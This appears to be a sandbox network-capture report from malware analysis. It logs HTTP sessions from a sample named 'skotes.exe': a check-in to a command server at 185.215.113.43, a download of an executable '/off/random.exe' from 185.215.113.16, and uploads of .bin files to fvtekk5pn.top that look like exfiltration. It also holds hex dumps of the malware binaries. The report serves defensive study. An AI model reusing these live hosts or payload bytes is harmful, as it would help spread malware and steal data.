                                                                                                                                                                                                                                                                                                            Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711270094 CET1236INData Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7
                                                                                                                                                                                                                                                                                                            Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItv
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711273909 CET1236INData Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c
                                                                                                                                                                                                                                                                                                            Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711287022 CET1236INData Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7
                                                                                                                                                                                                                                                                                                            Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711297989 CET1236INData Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91
                                                                                                                                                                                                                                                                                                            Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711308002 CET1236INData Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04
                                                                                                                                                                                                                                                                                                            Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711328983 CET1236INData Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10
                                                                                                                                                                                                                                                                                                            Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711338997 CET1236INData Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0
                                                                                                                                                                                                                                                                                                            Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.711349010 CET1236INData Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19
                                                                                                                                                                                                                                                                                                            Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:42.830957890 CET1236INData Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9
                                                                                                                                                                                                                                                                                                            Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            11192.168.2.449867185.215.113.43802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:46.941392899 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 30 37 39 31 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                                            Data Ascii: d1=1007916001&unit=246122658369
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:48.281754971 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:48 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            12192.168.2.449870185.215.113.16802800C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:48.605948925 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.16
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974227905 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:49 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                            Content-Length: 2811392
                                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 21 Nov 2024 10:52:38 GMT
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            ETag: "673f10f6-2ae600"
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 8a f7 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`+ `@ +*`Ui` @ @.rsrc`2@.idata 8@cpzpcpnh**:@ghvclarm @+*@.taggant@`+"*@
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974286079 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974297047 CET248INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974313974 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974328995 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974340916 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974354029 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974371910 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974383116 CET1236INData Raw: d0 1b a1 72 55 99 44 02 16 03 8c 46 d6 96 0e 07 a7 8e 44 32 90 3f 7c 79 de d7 71 b3 cf 7d 57 06 54 10 2e ac cb 25 31 0e a8 eb 65 4e 4f 5a 0e fe 09 d5 e6 69 4d fc 71 ff 2e 55 4f b0 d7 4e 5b 1b 57 88 79 46 fb e4 5b 9f 69 e5 24 06 3f e3 2e 93 df fa
                                                                                                                                                                                                                                                                                                            Data Ascii: rUDFD2?|yq}WT.%1eNOZiMq.UON[WyF[i$?.}cb{&M5]`-~6YD~@-~-+%5"_.E@GDcRwohsA%Xy*]lLe@z.Us&UGD78dG
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:49.974392891 CET776INData Raw: 29 c8 f0 08 c5 55 b2 79 56 47 05 e1 57 40 c7 b0 1c 6d 72 09 cf 68 ae ca c6 28 4c 09 9d 21 4f 77 12 0b 73 42 ba d8 03 c4 d5 f6 01 7f 80 2a 9c 71 d0 f5 61 21 24 04 79 ad 08 db 72 2d 8a f0 7d 1f d2 b9 62 fe f3 a8 77 75 78 00 a6 e5 21 d4 5a 7f ac ea
                                                                                                                                                                                                                                                                                                            Data Ascii: )UyVGW@mrh(L!OwsB*qa!$yr-}bwux!Z_.)FADSqx3kc8jX3I}Kj-N,|vo]ijDtr$OLC,Li^L@!cJQws+|vF
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.093971014 CET1236INData Raw: 11 9e ae dd 21 a5 e2 7a 4c 27 1f a6 af 51 7e 7b e9 3a 82 ec ef d8 17 7d a6 b6 4f ef 3d 7f 5f d6 dd f2 a5 e4 1e 91 15 dd da a7 76 76 95 df a6 e1 e0 88 a5 2e f6 c5 a5 16 dc 09 31 c9 c2 0a 9b 71 d1 70 9d 72 df 9f 95 a5 75 a1 5e 89 d9 a3 44 56 17 c2
                                                                                                                                                                                                                                                                                                            Data Ascii: !zL'Q~{:}O=_vv.1qpru^DVf}pN{DR]P&BQj#7*UN3hp|qw;|a/q\&w"k _jC?awQ?jar1,$p'cE&0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            13192.168.2.44987734.116.198.130807256C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:50.249902964 CET643OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Content-Length: 464
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------NU8hpSAPyQZ2PcV2KXp0Dk
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4e 55 38 68 70 53 41 50 79 51 5a 32 50 63 56 32 4b 58 70 30 44 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 61 6c 61 71 6f 6c 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 1f 1c 79 a4 5c 10 e8 ba bc 42 04 ef ad 92 eb e8 2e a6 b6 1f 99 92 04 bb f8 a9 a1 79 9d 5c f7 ae 2c 31 43 53 31 b6 99 d5 bf ce ac c8 d3 c8 f0 6d e3 b3 e7 0e c1 1a de a6 40 f7 06 5e 31 22 c0 ff 80 6d 8f f7 21 fd 32 02 f7 ba 1c 27 11 43 38 12 68 08 24 06 75 de 72 96 d0 44 27 fa 8e 49 a0 24 34 5f 84 e7 e3 b3 d1 f0 5d ae 38 70 e5 49 f2 cf 44 e7 c6 60 76 96 0d 10 89 57 f9 20 eb f0 0a 42 1d 8a 09 d6 39 1e f6 ab 53 41 17 96 8e d9 19 35 4e 75 56 97 bf 1a 81 8a 17 8d 4d aa 3c d7 c7 39 2f b9 0c 4e 1d 15 f3 75 86 60 b3 5e 07 d0 51 ff [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: --------------------------NU8hpSAPyQZ2PcV2KXp0DkContent-Disposition: form-data; name="file"; filename="Qalaqolu.bin"Content-Type: application/octet-streamy\B.y\,1CS1m@^1"m!2'C8h$urD'I$4_]8pID`vW B9SA5NuVM<9/Nu`^Q0t$5TI4/;aE|ZkU%||88qfu--------------------------NU8hpSAPyQZ2PcV2KXp0Dk--
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:51.665098906 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            date: Thu, 21 Nov 2024 11:10:51 GMT
                                                                                                                                                                                                                                                                                                            content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                            content-length: 2
                                                                                                                                                                                                                                                                                                            etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                                            Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                                            Data Ascii: OK


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            14192.168.2.44990134.116.198.130807256C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.093187094 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                            Content-Length: 91343
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=------------------------UmnIKSwV415tA2rpsAaOcS
                                                                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 55 6d 6e 49 4b 53 77 56 34 31 35 74 41 32 72 70 73 41 61 4f 63 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 56 6f 67 75 76 75 6d 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 7b 0a 3f e8 4c 67 aa 13 ea d6 1a 1a 4d 6f 6d 40 92 e6 f3 4a b7 d7 79 92 eb 61 8f 56 a9 d2 cc 03 66 e2 40 fc 9c f3 72 b6 46 61 65 a9 3e 76 99 ef f4 f4 be 74 5a f7 c8 6c c2 d9 f8 60 ba 21 c4 36 99 78 49 35 41 15 a1 c0 81 99 dc 26 73 48 da d6 42 cf 3d 2e 55 10 fc fb 9f b2 30 4a 31 46 56 48 79 c1 7f 05 0e 9a 3e 7e c3 f8 3e 83 87 0b 2e e4 cf 30 ac 17 2e 95 08 f6 16 a9 a4 68 90 83 a2 90 02 df 6b d6 1e 4b 83 53 12 de 83 b5 cf 05 27 9b b9 30 c5 1b 0e dd b6 5b 9c f9 d6 d0 9d af c9 3f 0b 70 c6 87 53 ea a6 3f 3c 6e bf dc 6e 29 3b 07 65 [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Data Ascii: --------------------------UmnIKSwV415tA2rpsAaOcSContent-Disposition: form-data; name="file"; filename="Voguvum.bin"Content-Type: application/octet-stream{?LgMom@JyaVf@rFae>vtZl`!6xI5A&sHB=.U0J1FVHy>~>.0.hkKS'0[?pS?<nn);eImf_}XmGfgw&o.+H%Foo< Kd3 DF)K9C|VDE=nBAqyLZI7Ig>C\[\GLr{hwI[h$1e"y+j.Bg:+yB=BY4]^`QT_&o@t8iJ!^r^@6Izz9,veEMn_]J%TPnHj)ZR79>tEL3BIe4SmD]WrY~{AC*fK^{MXV`AW=q|G^?__{q_MeDx3Av=z51r\45\tR/)J[\1-PsdKw^RN4%8.a7kN[#7KA;d79PUL0wyS6_TEHPz3*WP1\?3$TL=*e$b_uNq [TRUNCATED]
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.212836027 CET4944OUTData Raw: d0 45 bd bb ae 88 c9 ad fc da 9f be 60 a0 da c3 74 12 a1 6e e6 9f 6b 5c 5c 90 99 6c 3d 83 be a1 16 30 90 7c 1e 68 c7 57 0e 7a 86 f3 89 63 8d ea f1 22 1d 2a 8a 77 fd e6 db 14 2c 17 ab 7d bd 6a b3 15 4c 4a 1a d9 18 1a a6 05 63 67 71 e0 21 42 a8 db
                                                                                                                                                                                                                                                                                                            Data Ascii: E`tnk\\l=0|hWzc"*w,}jLJcgq!BW2r'f;QWhL}14k0zR[Bk!!4;;N-q'hkNfo 2Io='l`(v4t`]Tg-5%=Z/O%'s5
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.212924957 CET4944OUTData Raw: 72 18 05 d2 cc 95 34 4c 05 b2 e3 22 1f 77 00 86 a1 b2 50 08 6a 2e b1 81 45 4d 17 f6 31 2d 0b 93 f8 08 07 29 e0 86 a7 a1 fa c2 65 b5 f9 57 36 99 65 46 6b cf 54 7e 6a 45 ea 30 c1 a3 0b 08 ce fd 53 4f dc 94 62 3a 83 cf ce e9 f7 24 90 10 0e 1c 78 85
                                                                                                                                                                                                                                                                                                            Data Ascii: r4L"wPj.EM1-)eW6eFkT~jE0SOb:$xa\iAs\r#2{<f1NW:C-9&x"?onO#+_YS[<a-I0k v'_"{jN+m2.;`]kwKx<|t#6r4jj
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.213016987 CET2472OUTData Raw: a1 10 ff 6c 64 2e f0 70 07 76 6b 03 14 94 1d 49 70 33 95 60 e2 f1 dd 2d 29 07 e2 a9 21 13 40 6f 65 fc 6a b9 20 c7 71 9d c2 86 b8 41 91 4f 1b 9d 07 99 3a 28 ad 8c 77 2f 87 85 4d c1 df 57 4b 38 56 fd bd 76 21 50 e1 43 c7 8c 2f 5c ca 30 66 3d 68 41
                                                                                                                                                                                                                                                                                                            Data Ascii: ld.pvkIp3`-)!@oej qAO:(w/MWK8Vv!PC/\0f=hA.foyUyV@&TW#{,6)t}g.:$@19OztY]VxGp!pK46I@;DXT-'datxMu7T;2I(:8a5
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.213088989 CET2472OUTData Raw: cf e3 12 01 0f a7 d2 9d 21 3c 97 3a 68 06 df 29 e1 7b 19 fc b8 8f 2c 54 56 61 b8 eb 0b 42 90 6b c0 d8 a4 85 c9 4f 70 9f dd ff 28 7e 6f a9 2d 9a 45 e6 05 5c 05 fd 13 4e 43 6c 9b 54 38 85 ca b3 35 23 93 c8 77 e2 bc 59 bc 4c 54 d3 41 7f c1 d3 42 b5
                                                                                                                                                                                                                                                                                                            Data Ascii: !<:h){,TVaBkOp(~o-E\NClT85#wYLTAB+8U^>DxM*X9*DX/^N0_i=k}eA`eTov5^XlxPt(C3(Z|h&CIsl_nRIA}=)i'OG,sM
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.213166952 CET4944OUTData Raw: 77 c8 17 5c c4 82 d2 fe e6 58 bd c3 0a 27 2c d9 bc 78 ca b9 73 a3 69 8b 63 db e1 26 65 11 90 1a 00 31 dc cb bc 8f b9 95 ba f7 36 37 b8 0a 5f fc 97 e6 67 e1 6d 69 28 e5 3c 48 54 be 0c bf af a7 5f 75 cd 80 21 35 18 32 12 0d 43 47 7d 15 41 0a 9d 14
                                                                                                                                                                                                                                                                                                            Data Ascii: w\X',xsic&e167_gmi(<HT_u!52CG}A`x`[b9nU6ou;`A&w58Eb1s`C+l8l:a%G/!%txj5@@mME'Od"w:q C~u
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.213196039 CET4944OUTData Raw: 8a 6d 56 65 bd 1c ac 40 c1 2c 99 58 34 cc 35 b2 21 4c d4 58 db 96 95 8f 38 27 fa 45 09 04 d6 47 fa 49 8d 93 db ef 21 80 d3 a9 6c 18 87 e8 18 82 51 23 7a 1b d4 33 8a b5 ac d4 b0 f7 45 05 a8 6b 5b dc 7d c7 d3 84 12 bf ba 14 da 61 4f f5 f9 69 94 d5
                                                                                                                                                                                                                                                                                                            Data Ascii: mVe@,X45!LX8'EGI!lQ#z3Ek[}aOi@s^Qa=[2FTk\zG&**0,,fR,9C9e;LOq;MxW$8AL`7zTXbm^Q#jOl83M
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.332510948 CET4944OUTData Raw: a0 11 e6 42 15 1d 6e 68 5c 0a e9 af ec d8 de 20 3d 83 c3 3e 5d 27 a7 11 9f 49 13 af eb b8 73 5c 01 d6 22 c5 ca 31 74 6b 8c 03 4c 2a 3a ce 7a e1 82 a4 d8 60 47 fb 68 b9 23 ce 45 d5 d1 d0 e4 06 a3 44 6c d2 ab c6 80 a4 7b f5 68 5d 76 58 71 93 d1 82
                                                                                                                                                                                                                                                                                                            Data Ascii: Bnh\ =>]'Is\"1tkL*:z`Gh#EDl{h]vXq1ai#M,\\]:o4^B:+\,qO0^}gb!/cjoXbtHbki.eXFF!dy_@Sw-]Nm2*:Z/Dxq6
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.332642078 CET4944OUTData Raw: a9 3d 83 d1 62 19 76 a4 52 46 07 f8 33 b8 91 75 a0 3d e6 45 0b e7 84 d1 06 96 dd 58 ec 27 c9 a0 18 38 d1 b9 36 ab 0d ac 2e aa 2a 6f 0d 58 78 74 f9 2c 14 2b aa cc 43 a1 27 d1 96 20 f0 58 5d 9b 21 67 fd 6f 44 a0 d6 3b 97 31 a9 af 75 a4 53 87 c2 ee
                                                                                                                                                                                                                                                                                                            Data Ascii: =bvRF3u=EX'86.*oXxt,+C' X]!goD;1uSK%Ao>>sC`ab94i*o{iOO:,W\1ZX%N-\hlqK/@NK\R mD)*68|Qy8vK=h(mmbFo
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:54.332813025 CET4944OUTData Raw: f1 1d 45 be 63 c6 36 a1 80 57 2d c2 53 3c f2 39 ba bf f1 2c 9f 31 29 ea d0 ea f5 45 60 8d 18 84 22 35 d1 ed f2 24 7d 21 b3 d9 3b d9 68 90 8c a2 b8 4f 63 f1 b4 5c a5 62 16 5b 8f 39 1c 64 8e f8 80 b6 77 2d 99 02 e8 26 eb 90 fa 0e 2f 48 1b 0f 88 e2
                                                                                                                                                                                                                                                                                                            Data Ascii: Ec6W-S<9,1)E`"5$}!;hOc\b[9dw-&/H`Gb_@tw$pAjEd=aup8Jz8y/KQEdyT04"sui9B*Jm'T1PQfOIZy Y]{vT+
